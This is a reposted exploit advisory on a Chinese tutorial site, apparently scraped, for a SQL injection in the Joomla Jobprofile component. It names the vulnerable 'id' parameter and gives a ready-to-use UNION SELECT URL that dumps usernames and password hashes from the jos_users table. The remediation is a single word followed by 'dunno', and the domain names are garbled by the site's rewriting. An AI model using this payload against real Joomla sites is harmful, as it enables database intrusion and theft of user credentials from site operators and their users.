好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

Joomla Jobprofile Component (com_jobprofile) SQL注射

 

标题Joomla Component Jobprofile (com_jobprofile) SQL Injection Vulnerability

作者: kaMtiEz HdhCmsTest2cto测试数据

 

[软件信息]

 

[+] 开发者: http://HdhCmsTestthakkertech测试数据/

[+] INFO : http://extensions.joomla.org/extensions/ads-a-affiliates/jobs-a-recruitment/11924

[+] 下载 : http://HdhCmsTestthakkertech测试数据/products/joomla-extensions/components/jobprofile-joomla-component-detail. html

 

[问题文件]

 

 http://HdhCmsTest2cto测试数据 /[kaMtiEz]/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=[SQL]

 

[ XpL ]

 

 http://HdhCmsTest2cto测试数据 /[kaMtiEz]/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users--

 

[ 修复] 过滤

 

 dunno :">

 

查看更多关于Joomla Jobprofile Component (com_jobprofile) SQL注射的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did12840
  阅读:41次

上一篇: WSN Classifieds v.6.2.12 and 6.2.18多个缺陷及修复 - 网站

下一篇:SAE新浪云后端任意文件读取漏洞及修复 - 网站安

相关资讯